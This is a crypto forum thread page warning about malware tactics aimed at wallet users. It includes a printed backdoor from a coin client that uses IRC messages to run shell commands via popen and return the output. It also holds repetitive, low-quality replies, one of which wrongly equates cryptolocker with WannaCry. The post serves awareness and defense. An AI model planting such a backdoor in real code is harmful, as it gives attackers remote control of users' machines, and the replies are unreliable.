Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 8. (Read 834755 times)
August 05, 2018, 05:37:39 AM
These con artists are always picking up, getting to be more intelligent and more complex. Be cautious dependably. Download just from official locales and dependably check where the connection drives you will go.
August 04, 2018, 08:16:08 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Malwares or spywares are most common problems ,make sure that you are using an encrypted protections on device.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
here is the source code with macros resolved:
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Malwares or spywares are most common problems ,make sure that you are using an encrypted protections on device.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
One of the best ways to prevent malware infecting your devices is to have a machine dedicated for crypto mining/trading. This will allow you to separate your normal activities on the internet and your cryptocurrency related activities. This reduces the chance of malware infecting your machine and hackers stealing personal data.
To prevent malicious attempts to utilise your machine's processing power for mining it is recommended that you follow general online security advice. Do not go on to suspicious websites, regularly update your anti-virus software and activate two factor authentication to prevent anyone else from accessing your accounts on online exchanges.
To prevent malicious attempts to utilise your machine's processing power for mining it is recommended that you follow general online security advice. Do not go on to suspicious websites, regularly update your anti-virus software and activate two factor authentication to prevent anyone else from accessing your accounts on online exchanges.
This is one of the most terrifying thing. I am super careful but they are getting stronger each day. 
Im a newbie here, thank you for your advice, hope all newbie can read this, and for those people who just clicking without even reading what pop ups real intention , maybe some pop ups are just full of virus that can corrupt their file. be safe everyone and be cautions. thank you
Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.
This is terrifying.. . Individuals who have the ability and aptitudes utilizes it in most unsuitable way. On the off chance that lone they utilize it to improve things or help other individuals, the world would be lovely. I figure that is the thing that truly life is. A debt of gratitude is in order for this data. Expectation everybody will know about this
There are always malwares everywhere this is digital life. There is also hardware vulnerabilities in all our processors as was recently revealed. I forgot the name, but basically anyone can be hacked.
Eversince the computer invented the virus are also born at that time, now the sophisticated malware infection are getting increasingly affected to our software in computer to minimize them we must put anti virus in our computer system..
thank you very helpful, more alert for old threads that have been updated by irresponsible parties, will use various ways to rob.
Excellent theme, it will be useful to all this relevant information at the moment so thank you I will be in the best way on the Internet!
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
yes so true!..this thread will surely help especially to newbies like me...... please always bear in mind that before investing in any crypto, make sure to read everything including reviews and their white paper in order to avoid scams!..
This is becoming an increasing threat. Just over few days ago, a colleague also fell for the "new wallet" strategy. Luckily for her, we saved the day before more damage was done to her pc. These malwares steal information and all that. These are trying times.
Much obliged to you for the Information! I am new to this gathering and still need to take in a great deal. Smiley
I had an issue with a mark, I tapped on somebodies and got to some bizarre site. I trust my Antivirus blocked everything, except I don't know.
I had an issue with a mark, I tapped on somebodies and got to some bizarre site. I trust my Antivirus blocked everything, except I don't know.
Thanks for this its a big help i have a friend got hacked and he dont know how he's been hack so just wanna know is there any chance to prevent this like anti virus what will you recommeded anitu virus to prevent this kind of malware thanks its a big help.
This case makes you think. This is terrible and very dangerous for the owners of crypto-currencies. I advise you to use the ESET NOD 32 antivirus. A very convenient interface and a constantly updated virus database. With him there will be no problems. I really liked it, I use it for several years.
Some wallets/links have been detected by my antivirus often these days...so i auto update my antivirus virus and not proceed to malicious sites/download apps from external sources..It's better to be safe than sry!
Iam download some wallet, some times the wallet have some alert from my Antivirus. The core dev say its just a false alarm, its that true ? malware its really hard to remove thats why i was scare if my Laptop/PC got malware
Thanks for this its a big help i have a friend got hacked and he dont know how he's been hack so just wanna know is there any chance to prevent this like anti virus what will you recommeded anitu virus to prevent this kind of malware thanks its a big help.
I think its very terrible incident for us.Malware is one of the most useless virus.It generally killed our phone and hacked our all privacy by a group. Actually,we work hard for our own development but this group haked this within a minutes like a vampire's eating.This work done by some indolence people who are interests to earn money dishonestly. For these all things,everyone should be aware of sophisticated Malware infection attempts
Anyone of you encountered the ransom cryptolocker? Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?
cryptolocker or also known as wannacry malware that is spread like a worm that duplicates its self in the network of your computer meaning all computer connected to your network are in the great danger why you are running virtual machine to mine or to store wallets in crypto? it's a bad idea to use vm to run those such kind of stuffs.
Jump to: